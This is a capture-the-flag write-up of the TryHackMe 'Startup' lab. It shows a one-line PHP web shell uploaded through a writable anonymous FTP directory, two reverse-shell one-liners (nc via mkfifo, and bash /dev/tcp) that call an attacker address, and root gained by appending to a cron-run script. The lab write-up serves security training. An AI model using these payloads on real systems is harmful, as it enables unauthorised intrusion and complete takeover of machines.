Introduction

We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (incase you get hungry), but that is not why you are here. To be truthful, we aren’t sure if our developers know what they are doing and our security concerns are rising. We ask that you preform a thorough penetration test and try to own root. Good luck!.

This is Startup from TryHackMe. It’s easy rated but I could use a win, okay?

Ports

FTP, SSH and HTTP - all on their standard ports.

FTP

FTP has anonymous access, and most importantly there is a subdirectory inside the FTP root directory called ftp which is writeable.

PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx    2 65534    65534        4096 Nov 09 02:12 ftp [NSE: writeable]
|_-rw-r--r--    1 0        0             208 Nov 09 02:12 notice.txt

I use this to upload a basic PHP executor - the content is just:

<?php system($_GET['cmd']);?>

And I call it cmd.phtml.

HTTP

On the webserver we can find our file at http://10.10.4.167/files/ftp/ and then we can execute commands:

http://10.10.4.167/files/ftp/cmd.phtml?cmd=id

I get a reverse shell with Burp and pentestmonkey:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

www-data

Through some enumeration we find a directory called /incidents and within that is a packet capture file. The easy exfiltration method is to copy it to the webserver:

www-data@startup:/incidents$ cp suspicious.pcapng /var/www/html/files/ftp/pcap.pcapng

From there we can download it and open it with wireshark.

Trawling through the pcap, we can find where someone else has gotten a shell on the box:

Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 17:40:21 up 20 min,  1 user,  load average: 0.00, 0.03, 0.12
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
vagrant  pts/0    10.0.2.2         17:21    1:09   0.54s  0.54s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls
bin
--- Stuff removed for brevity ---
www-data@startup:/home$ sudo -l
sudo -l
[sudo] password for www-data: REDACTED

So now we have a password. We do have another user that looks interesting: lennie. Sure enough, we can su lennie with the password from the packet capture.

Lennie

Lennie can’t run sudo, but he has some root owned stuff:

lennie@startup:~/scripts$ ls -lash
ls -lash
total 16K
4.0K drwxr-xr-x 2 root   root   4.0K Nov  9 02:13 .
4.0K drwx------ 4 lennie lennie 4.0K Nov  9 02:12 ..
4.0K -rwxr-xr-x 1 root   root     77 Nov  9 02:12 planner.sh
4.0K -rw-r--r-- 1 root   root      1 Nov  9 09:27 startup_list.txt

What do these do? Let’s look one at a time.

planner.sh

lennie@startup:~/scripts$ cat planner.sh
cat planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh

startup_list.txt

It’s empty

/etc/print.sh

lennie@startup:~/scripts$ cat /etc/print.sh
cat /etc/print.sh
#!/bin/bash
echo "Done!"

Okay, so what do we have? The planner.sh script echoes the variable LIST into the startup_list file and then calls /etc/print.sh, which echoes the text Done!. How can we use this?

If we watch the directory for a little bit, we can see the startup_list.txt timestamp changes every minute. So there is a cron job running that calls planner.sh every minute. So let’s add a line to the /etc/print.sh file:

lennie@startup:~/scripts$ printf "bash -i >& /dev/tcp/10.9.10.123/1235 0>&1\n" >> /etc/print.sh

And start a new listener …

root@kali:/opt/tryhackme/spicehut# nc -nvlp 1235
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1235
Ncat: Listening on 0.0.0.0:1235
Ncat: Connection from 10.10.4.167.
Ncat: Connection from 10.10.4.167:40804.
bash: cannot set terminal process group (19455): Inappropriate ioctl for device
bash: no job control in this shell
root@startup:~# cd /root
cd /root
root@startup:~# ls -lash
ls -lash
total 28K
4.0K drwx------  4 root root 4.0K Nov  9 02:15 .
4.0K drwxr-xr-x 26 root root 4.0K Nov  9 08:34 ..
4.0K -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
4.0K drwxr-xr-x  2 root root 4.0K Nov  9 02:15 .nano
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-r--r--  1 root root   38 Nov  9 02:12 root.txt
4.0K drwx------  2 root root 4.0K Nov  9 02:10 .ssh
root@startup:~# cat root.txt
cat root.txt
THM{GO GET IT YOURSELF}

Yes it was ‘easy’ but hey a win’s a win. Thanks r1gormort1s.